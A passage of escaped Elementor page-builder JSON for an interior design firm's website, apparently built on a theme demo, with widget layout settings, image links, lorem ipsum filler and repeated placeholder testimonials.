ght\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute 